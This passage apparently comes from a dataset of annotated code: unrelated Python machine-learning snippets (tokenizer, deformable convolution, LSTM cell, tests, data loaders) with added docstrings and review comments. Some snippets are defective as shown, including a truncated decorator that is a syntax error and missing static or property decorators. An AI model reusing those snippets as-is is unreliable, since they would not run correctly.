        else:
            # Average only over the non-ignored positions.
            loss = (loss.sum() / float((loss.size(0) - masked_indices.sum())))
    return loss
def set_restricted_game_conversions_for_all_workers_openspiel(trainer: Trainer, tmp_base_env: MultiAgentEnv, delegate_policy_id: PolicyID, agent_id_to_restricted_game_specs: Dict[(AgentID, List[StrategySpec])], load_policy_spec_fn):
    """Install restricted-game observation converters on every rollout worker.

    Builds an obs converter per agent that has restricted-game specs, pushes
    the converters into each worker's envs and delegate policy, and exposes
    them on the trainer via ``trainer.get_local_converters``.
    """
    local_delegate_policy = trainer.workers.local_worker().policy_map[delegate_policy_id]
    player_converters = {}
    for (p, restricted_game_specs) in agent_id_to_restricted_game_specs.items():
        if (len(restricted_game_specs) == 0):
            continue
        player_converters[p] = get_restricted_game_obs_conversions(player=p, delegate_policy=local_delegate_policy, policy_specs=restricted_game_specs, load_policy_spec_fn=load_policy_spec_fn, tmp_base_env=tmp_base_env)
    # At most one player is expected to need conversions.
    assert ((len(player_converters) == 0) or (len(player_converters) == 1))

    def _set_worker_converters(worker: RolloutWorker):
        worker_delegate_policy = worker.policy_map[delegate_policy_id]
        for (p, player_converter) in player_converters.items():
            # Fix: bind the loop variables as lambda defaults. The original
            # closure captured `p`/`player_converter` late, so every env would
            # have seen the values from the final loop iteration.
            worker.foreach_env((lambda env, p=p, conv=player_converter: env.set_obs_conversion_dict(p, conv)))
        worker_delegate_policy.player_converters = player_converters
    trainer.workers.foreach_worker(_set_worker_converters)
    trainer.get_local_converters = (lambda : trainer.workers.local_worker().policy_map[delegate_policy_id].player_converters)
class MLP(nn.Module):
    """Two-layer MLP classifier: Linear -> ReLU -> Dropout -> Linear.

    Args:
        ninput: input feature dimension.
        nhidden: hidden layer width.
        nclass: number of output classes.
        dropout: dropout probability applied after the hidden activation.
    """

    def __init__(self, ninput=200, nhidden=150, nclass=2, dropout=0):
        super(MLP, self).__init__()
        self.fc1 = nn.Linear(ninput, nhidden)
        self.fc2 = nn.Linear(nhidden, nclass)
        self.dropout = dropout

    def forward(self, x):
        """Return class logits for input batch *x* of shape (N, ninput)."""
        out = F.relu(self.fc1(x))
        # Fix: pass training=self.training. The functional F.dropout defaults
        # to training=True, so the original applied dropout even in eval mode.
        out = F.dropout(out, self.dropout, training=self.training)
        out = self.fc2(out)
        return out
def get_config(parse=True, **optional_kwargs):
    """Parse command-line options into a Config, with keyword overrides.

    With parse=True unknown flags are an error (parse_args); otherwise they
    are ignored (parse_known_args).  *optional_kwargs* override any parsed
    values before the Config is built.
    """
    parser = argparse.ArgumentParser()
    # (flag, type, default) table — behaviorally identical to one
    # add_argument call per flag.
    for flag, flag_type, default in (
        ('--mode', str, 'train'),
        ('--verbose', str2bool, 'true'),
        ('--preprocessed', str2bool, 'True'),
        ('--video_type', str, '360airballoon'),
        ('--input_size', int, 2048),
        ('--hidden_size', int, 500),
        ('--num_layers', int, 2),
        ('--summary_rate', float, 0.3),
        ('--n_epochs', int, 50),
        ('--clip', float, 5.0),
        ('--lr', float, 0.0001),
        ('--discriminator_lr', float, 1e-05),
        ('--discriminator_slow_start', int, 15),
        ('--epoch', int, 2),
    ):
        parser.add_argument(flag, type=flag_type, default=default)
    namespace = parser.parse_args() if parse else parser.parse_known_args()[0]
    settings = vars(namespace)
    settings.update(optional_kwargs)
    return Config(**settings)
class DeformConvFunction(Function):
    """autograd Function for deformable convolution, backed by the _C CUDA ops.

    NOTE(review): forward/backward take ``ctx`` as their first argument
    (new-style Function signature) but carry no @staticmethod decorator in
    this source; upstream implementations declare them static — confirm the
    decorators were not stripped during extraction.
    """

    def forward(ctx, input, offset, weight, stride=1, padding=0, dilation=1, groups=1, deformable_groups=1, im2col_step=64):
        """Run the forward deformable convolution (CUDA only)."""
        if ((input is not None) and (input.dim() != 4)):
            raise ValueError('Expected 4D tensor as input, got {}D tensor instead.'.format(input.dim()))
        ctx.stride = _pair(stride)
        ctx.padding = _pair(padding)
        ctx.dilation = _pair(dilation)
        ctx.groups = groups
        ctx.deformable_groups = deformable_groups
        ctx.im2col_step = im2col_step
        ctx.save_for_backward(input, offset, weight)
        output = input.new_empty(DeformConvFunction._output_size(input, weight, ctx.padding, ctx.dilation, ctx.stride))
        # Scratch buffers reused by the CUDA kernels.
        ctx.bufs_ = [input.new_empty(0), input.new_empty(0)]
        if (not input.is_cuda):
            raise NotImplementedError
        else:
            cur_im2col_step = min(ctx.im2col_step, input.shape[0])
            assert ((input.shape[0] % cur_im2col_step) == 0), 'im2col step must divide batchsize'
            _C.deform_conv_forward(input, weight, offset, output, ctx.bufs_[0], ctx.bufs_[1], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, cur_im2col_step)
        return output

    # Fix: the original source contained a bare `_differentiable` expression
    # here (a corrupted decorator, most likely `@once_differentiable`), which
    # would raise NameError when the class body executes; it has been removed.
    def backward(ctx, grad_output):
        """Compute gradients w.r.t. input, offset and weight (CUDA only)."""
        (input, offset, weight) = ctx.saved_tensors
        grad_input = grad_offset = grad_weight = None
        if (not grad_output.is_cuda):
            raise NotImplementedError
        else:
            cur_im2col_step = min(ctx.im2col_step, input.shape[0])
            assert ((input.shape[0] % cur_im2col_step) == 0), 'im2col step must divide batchsize'
            if (ctx.needs_input_grad[0] or ctx.needs_input_grad[1]):
                grad_input = torch.zeros_like(input)
                grad_offset = torch.zeros_like(offset)
                _C.deform_conv_backward_input(input, offset, grad_output, grad_input, grad_offset, weight, ctx.bufs_[0], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, cur_im2col_step)
            if ctx.needs_input_grad[2]:
                grad_weight = torch.zeros_like(weight)
                _C.deform_conv_backward_parameters(input, offset, grad_output, grad_weight, ctx.bufs_[0], ctx.bufs_[1], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, 1, cur_im2col_step)
        # One None per non-tensor forward argument (stride ... im2col_step).
        return (grad_input, grad_offset, grad_weight, None, None, None, None, None)

    def _output_size(input, weight, padding, dilation, stride):
        """Compute the (N, C_out, H_out, W_out) shape of the conv output."""
        channels = weight.size(0)
        output_size = (input.size(0), channels)
        for d in range((input.dim() - 2)):
            in_size = input.size((d + 2))
            pad = padding[d]
            kernel = ((dilation[d] * (weight.size((d + 2)) - 1)) + 1)
            stride_ = stride[d]
            output_size += (((((in_size + (2 * pad)) - kernel) // stride_) + 1),)
        if (not all(map((lambda s: (s > 0)), output_size))):
            raise ValueError('convolution input is too small (output would be {})'.format('x'.join(map(str, output_size))))
        return output_size
class LinearResidual(nn.Module):
    """Residual stack of Linear+BatchNorm+ReLU blocks: forward is relu(x + F(x))."""

    def __init__(self, input_size=1024, output_size=1024, n_resmods=1, dropout=False):
        super(LinearResidual, self).__init__()
        thisname = self.__class__.__name__
        self.dropout_prob = 0.5
        self.n_mods = n_resmods
        print('[INFO] ({}) Initializing module'.format(thisname))
        print('[INFO] ({}) Using dropout? {}'.format(thisname, dropout))
        print('[INFO] ({}) Dropout val {}'.format(thisname, self.dropout_prob))
        print('[INFO] ({}) N of inner layers {}'.format(thisname, n_resmods))
        # At least one block is always built (matches the original, which
        # created the first block unconditionally and added n_resmods-1 more).
        layers = []
        for _ in range(max(1, n_resmods)):
            layers.extend([nn.Linear(input_size, output_size), nn.BatchNorm1d(output_size), nn.ReLU(inplace=True)])
            if dropout:
                layers.append(nn.Dropout(p=self.dropout_prob))
        self.back = nn.Sequential(*layers)
        self.relu = nn.ReLU()
        Utils.normal_init(self.back)

    def forward(self, x):
        """Apply the residual stack and return relu(x + back(x))."""
        residual = self.back(x)
        return self.relu(x + residual)
class BertTokenizer(PreTrainedTokenizer):
    """BERT tokenizer: optional basic (whitespace/punctuation) tokenization
    followed by WordPiece sub-word splitting against a fixed vocabulary.
    """
    # Class-level maps consumed by the PreTrainedTokenizer machinery.
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES

    def __init__(self, vocab_file, do_lower_case=True, do_basic_tokenize=True, never_split=None, unk_token='[UNK]', sep_token='[SEP]', pad_token='[PAD]', cls_token='[CLS]', mask_token='[MASK]', tokenize_chinese_chars=True, strip_accents=None, **kwargs):
        """Load the vocabulary file and build the basic/WordPiece sub-tokenizers.

        Raises:
            ValueError: if *vocab_file* does not exist on disk.
        """
        super().__init__(do_lower_case=do_lower_case, do_basic_tokenize=do_basic_tokenize, never_split=never_split, unk_token=unk_token, sep_token=sep_token, pad_token=pad_token, cls_token=cls_token, mask_token=mask_token, tokenize_chinese_chars=tokenize_chinese_chars, strip_accents=strip_accents, **kwargs)
        if (not os.path.isfile(vocab_file)):
            raise ValueError(f"Can't find a vocabulary file at path '{vocab_file}'. To load the vocabulary from a Google pretrained model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`")
        self.vocab = load_vocab(vocab_file)
        # Reverse map: id -> token, preserving vocabulary order.
        self.ids_to_tokens = collections.OrderedDict([(ids, tok) for (tok, ids) in self.vocab.items()])
        self.do_basic_tokenize = do_basic_tokenize
        if do_basic_tokenize:
            self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case, never_split=never_split, tokenize_chinese_chars=tokenize_chinese_chars, strip_accents=strip_accents)
        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=self.unk_token)

    # NOTE(review): upstream transformers defines do_lower_case and vocab_size
    # as @property accessors; the decorators appear to have been stripped in
    # this copy — confirm against the original source.
    def do_lower_case(self):
        return self.basic_tokenizer.do_lower_case

    def vocab_size(self):
        return len(self.vocab)

    def get_vocab(self):
        """Return the full token -> id map, including tokens added after init."""
        return dict(self.vocab, **self.added_tokens_encoder)

    def _tokenize(self, text):
        """Split *text* into sub-word tokens (basic tokenization first if enabled)."""
        split_tokens = []
        if self.do_basic_tokenize:
            for token in self.basic_tokenizer.tokenize(text, never_split=self.all_special_tokens):
                # Tokens in never_split (e.g. special tokens) bypass WordPiece.
                if (token in self.basic_tokenizer.never_split):
                    split_tokens.append(token)
                else:
                    split_tokens += self.wordpiece_tokenizer.tokenize(token)
        else:
            split_tokens = self.wordpiece_tokenizer.tokenize(text)
        return split_tokens

    def _convert_token_to_id(self, token):
        """Map a token string to its vocabulary id (the unk id if unknown)."""
        return self.vocab.get(token, self.vocab.get(self.unk_token))

    def _convert_id_to_token(self, index):
        """Map a vocabulary id back to its token string (the unk token if unknown)."""
        return self.ids_to_tokens.get(index, self.unk_token)

    def convert_tokens_to_string(self, tokens):
        """Join tokens into text, undoing the WordPiece ' ##' continuation markers."""
        out_string = ' '.join(tokens).replace(' ##', '').strip()
        return out_string

    def build_inputs_with_special_tokens(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None) -> List[int]:
        """Add special tokens: [CLS] A [SEP] for one sequence, [CLS] A [SEP] B [SEP] for a pair."""
        if (token_ids_1 is None):
            return (([self.cls_token_id] + token_ids_0) + [self.sep_token_id])
        cls = [self.cls_token_id]
        sep = [self.sep_token_id]
        return ((((cls + token_ids_0) + sep) + token_ids_1) + sep)

    def get_special_tokens_mask(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None, already_has_special_tokens: bool=False) -> List[int]:
        """Return a mask with 1 at special-token positions and 0 at sequence tokens."""
        if already_has_special_tokens:
            return super().get_special_tokens_mask(token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True)
        if (token_ids_1 is not None):
            return (((([1] + ([0] * len(token_ids_0))) + [1]) + ([0] * len(token_ids_1))) + [1])
        return (([1] + ([0] * len(token_ids_0))) + [1])

    def create_token_type_ids_from_sequences(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None) -> List[int]:
        """Segment ids: 0 over [CLS] A [SEP], 1 over B [SEP] when a pair is given."""
        sep = [self.sep_token_id]
        cls = [self.cls_token_id]
        if (token_ids_1 is None):
            return (len(((cls + token_ids_0) + sep)) * [0])
        return ((len(((cls + token_ids_0) + sep)) * [0]) + (len((token_ids_1 + sep)) * [1]))

    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str]=None) -> Tuple[str]:
        """Write the vocabulary to disk, one token per line in id order.

        Returns:
            A 1-tuple with the path of the written vocabulary file.
        """
        index = 0
        if os.path.isdir(save_directory):
            vocab_file = os.path.join(save_directory, (((filename_prefix + '-') if filename_prefix else '') + VOCAB_FILES_NAMES['vocab_file']))
        else:
            # save_directory is treated as a full file path when it is not a directory.
            vocab_file = (((filename_prefix + '-') if filename_prefix else '') + save_directory)
        with open(vocab_file, 'w', encoding='utf-8') as writer:
            for (token, token_index) in sorted(self.vocab.items(), key=(lambda kv: kv[1])):
                # Ids should be consecutive; warn (but continue) on gaps.
                if (index != token_index):
                    logger.warning(f'Saving vocabulary to {vocab_file}: vocabulary indices are not consecutive. Please check that the vocabulary is not corrupted!')
                    index = token_index
                writer.write((token + '\n'))
                index += 1
        return (vocab_file,)
# NOTE(review): this decorator line is truncated — it begins with
# `.register(...)` and is missing the registry object it is called on
# (a syntax error as-is). Restore the registry name from the original source.
.register('GhostNet')
def build_ghostnet_backbone(cfg):
    """Build a GhostNet backbone from the model config.

    Reads channel/compression/attention settings plus conv/norm/activation
    factories from *cfg* and forwards them to GhostBackbone.
    """
    in_channels = cfg.MODEL.BACKBONE.IN_PLANES
    base_channels = cfg.MODEL.BACKBONE.BASE_PLANES
    width_multiplier = cfg.MODEL.COMPRESSION.WIDTH_MULTIPLIER
    round_nearest = cfg.MODEL.COMPRESSION.ROUND_NEAREST
    attention_type = cfg.MODEL.ATTENTION.ATTENTION_TYPE
    # Layer factories resolved from the config (conv/norm/activation types).
    conv_layer = get_conv(cfg)
    norm_layer = get_norm(cfg)
    act_layer = get_act(cfg)
    sigmoid_type = cfg.MODEL.ACT.SIGMOID_TYPE
    return GhostBackbone(in_channels=in_channels, base_channels=base_channels, width_multiplier=width_multiplier, round_nearest=round_nearest, attention_type=attention_type, sigmoid_type=sigmoid_type, conv_layer=conv_layer, norm_layer=norm_layer, act_layer=act_layer)
def test(test_loader, model, epoch):
    """Evaluate *model* on *test_loader*, log running F-max/MAE, append a CSV row.

    Returns:
        The mean MAE over all evaluated images.
    """
    model.eval()
    Eval = Eval_thread()
    n = 0
    mae_ls = []
    fmax_ls = []
    with torch.no_grad():
        for (j_batch, test_data) in enumerate(test_loader):
            X_test = Variable(test_data[0])
            y_test = Variable(test_data[1])
            X_test = X_test.cuda()
            y_test = y_test.cuda()
            # Grayscale inputs are replicated to 3 channels.
            if (X_test.shape[1] == 1):
                X_test = torch.cat([X_test, X_test, X_test], 1)
            (_, output_test) = model(X_test)
            pred = bv_test(output_test)
            # Fix: F.upsample is deprecated (removed in recent torch);
            # F.interpolate takes the same size/mode/align_corners arguments.
            pred = F.interpolate(pred, size=(y_test.shape[2], y_test.shape[3]), mode='bilinear', align_corners=False)
            # Per-image metrics (MAE and max F-measure).
            for im in range(y_test.shape[0]):
                (mae, fmax) = Eval.run(pred[im], y_test[im])
                mae_ls.append(mae)
                fmax_ls.append(fmax)
            if ((j_batch % 100) == 0):
                print((((('test [Iteration : ' + str(j_batch)) + '/') + str(len(test_loader))) + ('] fmax:%.3f mae:%.3f' % (np.mean(fmax_ls), np.mean(mae_ls)))))
    # Append epoch results to save/results.csv.
    csv = 'results.csv'
    with open(os.path.join('save', csv), 'a') as f:
        f.write(('%03d,%0.6f,%0.5f \n' % ((epoch + 1), np.mean(mae_ls), np.mean(fmax_ls))))
    return np.mean(mae_ls)
def remove_punctuation(x):
    """Strip ASCII punctuation from *x* and collapse whitespace runs to single spaces."""
    # One C-level pass removes all punctuation characters.
    depunctuated = x.translate(str.maketrans('', '', string.punctuation))
    # split() with no args drops leading/trailing/repeated whitespace.
    return ' '.join(depunctuated.split())
def VarLSTMCell(input, hidden, w_ih, w_hh, b_ih=None, b_hh=None, noise_in=None, noise_hidden=None):
    """One step of a variational LSTM cell with optional multiplicative noise.

    The four gate projections are batched along dim 0 (hence the expand to 4);
    noise_in / noise_hidden, when given, are per-gate dropout masks applied to
    the input and the previous hidden state respectively.
    """
    (hx, cx) = hidden
    if noise_in is None:
        gate_input = input.expand(4, *input.size())
    else:
        gate_input = input.unsqueeze(0) * noise_in
    if noise_hidden is None:
        gate_hidden = hx.expand(4, *hx.size())
    else:
        gate_hidden = hx.unsqueeze(0) * noise_hidden
    # (4, batch, hidden): one slice per gate, unpacked along dim 0.
    gates = torch.baddbmm(b_ih.unsqueeze(1), gate_input, w_ih) + torch.baddbmm(b_hh.unsqueeze(1), gate_hidden, w_hh)
    (raw_i, raw_f, raw_g, raw_o) = gates
    ingate = torch.sigmoid(raw_i)
    forgetgate = torch.sigmoid(raw_f)
    cellgate = torch.tanh(raw_g)
    outgate = torch.sigmoid(raw_o)
    cy = (forgetgate * cx) + (ingate * cellgate)
    hy = outgate * torch.tanh(cy)
    return (hy, cy)
class TranslationEnToDePipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
    """Pipeline smoke tests for the en->de translation task.

    The actual test methods come from MonoInputPipelineCommonMixin; this class
    only configures which task/models/inputs the shared tests exercise.
    """
    pipeline_task = 'translation_en_to_de'
    # Tiny model used for fast CI runs; no large model is exercised.
    small_models = ['patrickvonplaten/t5-tiny-random']
    large_models = [None]
    # Inputs the pipeline is expected to reject.
    invalid_inputs = [4, '<mask>']
    # Keys every pipeline output dict must contain.
    mandatory_keys = ['translation_text']
class PabeeTests(TestCasePlus):
    """End-to-end test for the PABEE run_glue example script."""

    def test_run_glue(self):
        """Train+eval albert-base-v2 on the MRPC fixture and require scores >= 0.75."""
        # Mirror the script's logging to stdout so failures are debuggable.
        stream_handler = logging.StreamHandler(sys.stdout)
        logger.addHandler(stream_handler)
        tmp_dir = self.get_auto_remove_tmp_dir()
        # CLI argv for run_glue_with_pabee.main(), built via str.split().
        testargs = f'''
            run_glue_with_pabee.py
            --model_type albert
            --model_name_or_path albert-base-v2
            --data_dir ./tests/fixtures/tests_samples/MRPC/
            --output_dir {tmp_dir}
            --overwrite_output_dir
            --task_name mrpc
            --do_train
            --do_eval
            --per_gpu_train_batch_size=2
            --per_gpu_eval_batch_size=1
            --learning_rate=2e-5
            --max_steps=50
            --warmup_steps=2
            --seed=42
            --max_seq_length=128
            '''.split()
        with patch.object(sys, 'argv', testargs):
            result = run_glue_with_pabee.main()
            for value in result.values():
                self.assertGreaterEqual(value, 0.75)
def test_get_git_hash():
    """Check get_git_hash truncation and its fallback when the git command fails."""
    # Success path: the mocked git command returns a fixed hash.
    with patch('mmcv.utils.version_utils._minimal_ext_cmd', _mock_cmd_success):
        assert (get_git_hash() == '3b46d33e90c397869adfdfc9812aa0')
        assert (get_git_hash(digits=6) == '3b46d3')
        # Requesting more digits than available returns the full hash.
        assert (get_git_hash(digits=100) == get_git_hash())
    # Failure path: falls back to 'unknown' or a caller-provided value.
    with patch('mmcv.utils.version_utils._minimal_ext_cmd', _mock_cmd_fail):
        assert (get_git_hash() == 'unknown')
        assert (get_git_hash(fallback='n/a') == 'n/a')
class Rag(object):
    """Region adjacency graph over a label image, with an ultrametric merge tree.

    Args:
        labels: integer label image; node ids are label values.
        connectivity: pixel connectivity passed to fast_rag.
    """

    def __init__(self, labels: np.ndarray, connectivity: int=1):
        self.labels = labels
        self.graph = fast_rag(labels, connectivity)
        self.tree = tree.Ultrametric(init_nodes=self.graph.nodes())

    def merge_subgraph(self, subgraph: Iterable=(), source: int=None):
        """Merge the nodes of each connected component of *subgraph* in the tree.

        Fix: the default was a shared mutable ``{}``; an immutable empty tuple
        has the same semantics (an empty iterable of nodes) without the
        mutable-default pitfall.

        Args:
            subgraph: iterable of node ids restricting the merge.
            source: optional DFS root used to order the merges.
        """
        subgraph = self.graph.subgraph(subgraph)
        if (len(subgraph) == 0):
            # Nothing to merge (also guards against empty subgraph input).
            return
        for connected_subgraph in (self.graph.subgraph(c) for c in nx.connected_components(subgraph)):
            # Merge along a DFS preorder so each merge extends the current root.
            ordered_nodes = nx.dfs_preorder_nodes(connected_subgraph, source)
            current_node = next(ordered_nodes)
            for next_node in ordered_nodes:
                current_node = self.tree.merge(current_node, next_node)

    def current_segmentation(self, cut_threshold: float=np.inf) -> np.ndarray:
        """Return the segmentation induced by cutting the merge tree at *cut_threshold*."""
        label_map = self.tree.get_map(cut_threshold)
        return label_map[self.labels]
def test_dcn_center_head():
    """GPU test for CenterHead with a DCN separate head: forward, loss, get_bboxes."""
    if (not torch.cuda.is_available()):
        pytest.skip('test requires GPU and CUDA')
    set_random_seed(0)
    # Six detection task groups (nuScenes-style class split).
    tasks = [dict(num_class=1, class_names=['car']), dict(num_class=2, class_names=['truck', 'construction_vehicle']), dict(num_class=2, class_names=['bus', 'trailer']), dict(num_class=1, class_names=['barrier']), dict(num_class=2, class_names=['motorcycle', 'bicycle']), dict(num_class=2, class_names=['pedestrian', 'traffic_cone'])]
    voxel_size = [0.2, 0.2, 8]
    dcn_center_head_cfg = dict(type='CenterHead', in_channels=sum([128, 128, 128]), tasks=[dict(num_class=1, class_names=['car']), dict(num_class=2, class_names=['truck', 'construction_vehicle']), dict(num_class=2, class_names=['bus', 'trailer']), dict(num_class=1, class_names=['barrier']), dict(num_class=2, class_names=['motorcycle', 'bicycle']), dict(num_class=2, class_names=['pedestrian', 'traffic_cone'])], common_heads={'reg': (2, 2), 'height': (1, 2), 'dim': (3, 2), 'rot': (2, 2), 'vel': (2, 2)}, share_conv_channel=64, bbox_coder=dict(type='CenterPointBBoxCoder', post_center_range=[(- 61.2), (- 61.2), (- 10.0), 61.2, 61.2, 10.0], max_num=500, score_threshold=0.1, pc_range=[(- 51.2), (- 51.2)], out_size_factor=4, voxel_size=voxel_size[:2], code_size=9), separate_head=dict(type='DCNSeparateHead', dcn_config=dict(type='DCN', in_channels=64, out_channels=64, kernel_size=3, padding=1, groups=4, bias=False), init_bias=(- 2.19), final_kernel=3), loss_cls=dict(type='GaussianFocalLoss', reduction='mean'), loss_bbox=dict(type='L1Loss', reduction='none', loss_weight=0.25), norm_bbox=True)
    train_cfg = dict(grid_size=[512, 512, 1], point_cloud_range=[(- 51.2), (- 51.2), (- 5.0), 51.2, 51.2, 3.0], voxel_size=voxel_size, out_size_factor=4, dense_reg=1, gaussian_overlap=0.1, max_objs=500, min_radius=2, code_weights=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.2, 0.2, 1.0, 1.0])
    test_cfg = dict(post_center_limit_range=[(- 61.2), (- 61.2), (- 10.0), 61.2, 61.2, 10.0], max_per_img=500, max_pool_nms=False, min_radius=[4, 12, 10, 1, 0.85, 0.175], post_max_size=83, score_threshold=0.1, pc_range=[(- 51.2), (- 51.2)], out_size_factor=4, voxel_size=voxel_size[:2], nms_type='circle')
    dcn_center_head_cfg.update(train_cfg=train_cfg, test_cfg=test_cfg)
    dcn_center_head = build_head(dcn_center_head_cfg).cuda()
    # Forward pass: check the per-task output map shapes.
    x = torch.ones([2, 384, 128, 128]).cuda()
    output = dcn_center_head([x])
    for i in range(6):
        assert (output[i][0]['reg'].shape == torch.Size([2, 2, 128, 128]))
        assert (output[i][0]['height'].shape == torch.Size([2, 1, 128, 128]))
        assert (output[i][0]['dim'].shape == torch.Size([2, 3, 128, 128]))
        assert (output[i][0]['rot'].shape == torch.Size([2, 2, 128, 128]))
        assert (output[i][0]['vel'].shape == torch.Size([2, 2, 128, 128]))
        assert (output[i][0]['heatmap'].shape == torch.Size([2, tasks[i]['num_class'], 128, 128]))
    # Loss computation on random ground truth (batch of 2 samples).
    gt_bboxes_0 = LiDARInstance3DBoxes(torch.rand([10, 9]).cuda(), box_dim=9)
    gt_bboxes_1 = LiDARInstance3DBoxes(torch.rand([20, 9]).cuda(), box_dim=9)
    gt_labels_0 = torch.randint(1, 11, [10]).cuda()
    gt_labels_1 = torch.randint(1, 11, [20]).cuda()
    gt_bboxes_3d = [gt_bboxes_0, gt_bboxes_1]
    gt_labels_3d = [gt_labels_0, gt_labels_1]
    loss = dcn_center_head.loss(gt_bboxes_3d, gt_labels_3d, output)
    # All loss terms must be non-negative.
    for (key, item) in loss.items():
        if ('heatmap' in key):
            assert (item >= 0)
        else:
            assert (torch.sum(item) >= 0)
    # Decoding: result counts are bounded by max_per_img (500).
    img_metas = [dict(box_type_3d=LiDARInstance3DBoxes), dict(box_type_3d=LiDARInstance3DBoxes)]
    ret_lists = dcn_center_head.get_bboxes(output, img_metas)
    for ret_list in ret_lists:
        assert (ret_list[0].tensor.shape[0] <= 500)
        assert (ret_list[1].shape[0] <= 500)
        assert (ret_list[2].shape[0] <= 500)
def gradient_check():
    """Numerically verify KernelConv2DFunction gradients over random shapes (requires CUDA)."""
    kernel_size_list = [1, 3]
    len_list = [8, 10]
    for i in range(10):
        B = random.randint(1, 4)
        C = (i + 1)
        K = random.choice(kernel_size_list)
        H = random.choice(len_list)
        W = random.choice(len_list)
        # Fix: create leaf tensors directly on the GPU. The original
        # `torch.randn(..., requires_grad=True).cuda()` produced non-leaf
        # copies, so gradcheck perturbed/tracked the copy rather than a leaf.
        input = torch.randn(B, C, ((H + K) - 1), ((W + K) - 1), device='cuda', requires_grad=True)
        kernel = torch.randn(B, ((C * K) * K), H, W, device='cuda', requires_grad=True)
        print(torch.autograd.gradcheck(KernelConv2DFunction(K), (input, kernel), eps=0.1, atol=1e-05, rtol=0.001, raise_exception=True))
class LogisticRegressionNetwork(Model):
    """Two-input logistic regression: sigmoid(dense1(x1) + dense2(x2))."""

    def __init__(self) -> None:
        super().__init__()
        # One scalar-output dense layer per input branch.
        self.dense1 = Dense(1)
        self.dense2 = Dense(1)
        self.sigmoid = tf.nn.sigmoid

    def call(self, x1, x2):
        """Project both inputs, sum the projections, and squash with sigmoid."""
        branch1 = self.dense1(x1)
        branch2 = self.dense2(x2)
        combined = tf.reduce_sum(tf.stack([branch1, branch2]), 0)
        return self.sigmoid(combined)
class ClevrQuestion(torch.utils.data.Dataset):
    """CLEVR VQA dataset: yields (transformed image, question target) pairs."""

    def __init__(self, img_folder, ann_file, transforms):
        super(ClevrQuestion, self).__init__()
        self.transforms = transforms
        self.root = img_folder
        with open(ann_file, 'r') as f:
            self.questions = json.load(f)['questions']

    def __len__(self):
        return len(self.questions)

    def __getitem__(self, idx):
        question = self.questions[idx]
        image_path = os.path.join(self.root, question['image_filename'])
        img = Image.open(image_path).convert('RGB')
        # Fall back to the dataset index when no explicit question index exists.
        if 'question_index' in question:
            question_id = question['question_index']
        else:
            question_id = idx
        target = {'questionId': question_id, 'caption': question['question']}
        if ('answer' in question):
            target = _encode_answer(target, question['answer'])
        if (self.transforms is not None):
            # The transform expects a detection-style target; pass empty boxes.
            empty_annotations = {'boxes': torch.zeros(0, 4), 'labels': torch.zeros(0), 'iscrowd': torch.zeros(0), 'positive_map': torch.zeros(0)}
            (img, _) = self.transforms(img, empty_annotations)
        return (img, target)
def read_rdf(fp):
    """Read a tab-separated file and return a list of per-line token lists.

    Each line is stripped of surrounding whitespace and split on tabs.
    """
    with open(fp, 'r', encoding='utf-8') as handle:
        return [line.strip().split('\t') for line in handle]
def draw_in_poincare_ball(embeddings: np.ndarray, label: Optional[np.ndarray]=None, dim: int=2, reduce_method: str='pca', cmap='viridis') -> plt.figure:
    """Project *embeddings* into a 2D/3D Poincare ball and plot them.

    Args:
        embeddings: high-dimensional points to project.
        label: optional per-point labels used for coloring.
        dim: target dimensionality of the plot (2 or 3).
        reduce_method: dimensionality-reduction method passed through.
        cmap: matplotlib colormap for the scatter colors.

    Raises:
        ValueError: if *dim* is not 2 or 3.

    NOTE(review): despite the return annotation, this function returns None —
    the plotting helpers are invoked for their side effects. Confirm whether
    the current figure should be returned instead.
    """
    emb_low = project_to_poincare_ball(embeddings, dim, reduce_method)
    if (dim == 2):
        plot_2d_embedding(emb_low, label, cmap=cmap)
    elif (dim == 3):
        plot_3d_embedding(emb_low, label, cmap=cmap)
    else:
        raise ValueError('dim must be 2 or 3.')
def resnet_v2_50(inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, centered_stride=False, reuse=None, scope='resnet_v2_50'):
    """Build a ResNet-v2-50 network from its four standard block groups.

    NOTE(review): centered_stride=True evaluates np.log2(output_stride), so
    output_stride must be set in that case — confirm callers never pass
    centered_stride without output_stride.
    """
    # Flags for which of the three strided blocks (if any) uses a centered stride.
    c = [False, False, False]
    if centered_stride:
        # Pick the last strided block reached at the requested output stride.
        i_last = (int(np.round(np.log2(output_stride))) - 3)
        if (i_last >= 0):
            c[i_last] = True
    # Standard ResNet-50 v2 configuration: 3/4/6/3 units per block group.
    blocks = [resnet_v2_block('block1', base_depth=64, num_units=3, stride=2, centered_stride=c[0]), resnet_v2_block('block2', base_depth=128, num_units=4, stride=2, centered_stride=c[1]), resnet_v2_block('block3', base_depth=256, num_units=6, stride=2, centered_stride=c[2]), resnet_v2_block('block4', base_depth=512, num_units=3, stride=1)]
    return resnet_v2(inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=True, reuse=reuse, scope=scope)
class Zencoder(nn.Module):
    """Style encoder: encodes the input image and pools one style code per
    segmentation region, plus one global (mean) code per sample.
    """

    def __init__(self, input_nc, ngf=64, norm='instance', act='LeakyReLU', use_spect=True):
        super(Zencoder, self).__init__()
        norm_layer = get_norm_layer(norm_type=norm)
